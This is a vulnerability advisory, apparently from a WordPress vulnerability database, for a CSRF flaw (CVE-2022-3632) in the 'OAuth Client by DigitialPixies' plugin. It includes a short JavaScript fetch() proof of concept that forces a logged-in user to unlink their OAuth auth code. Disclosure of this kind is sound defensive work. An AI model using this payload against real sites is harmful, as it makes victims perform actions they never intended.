OAuth Client by DigitialPixies <= 1.1.0 – CSRF | CVE 2022-3632 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions.

Proof of Concept

Make a logged in user visit a page with the following code

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=dpt-oauth-ajax&call=unlink_auth_code',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

dpt-oauth-client

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

4c1b0e5e-245a-4d1f-a561-e91af906e62d

Timeline

Publicly Published

2022-10-21 (about 1 years ago)

Added

2022-10-21 (about 1 years ago)

Last Updated

2022-10-21 (about 1 years ago)

Other

Published

Title

Published

2020-09-26

Title

Customizr < 4.3.1 - Arbitrary Settings Update via CSRF

Published

2014-08-01

Title

A Forms 1.4.0 - Form Submission CSRF

Published

2022-10-28

Title

Creative Mail < 1.6.0 - Multiple CSRF

Published

2014-12-14

Title

Yurl Retwitt <= 1.4 - Multiple CSRF

Published

2023-10-16

Title

Taggbox <= 3.3 - Arbitrary Settings Update via CSRF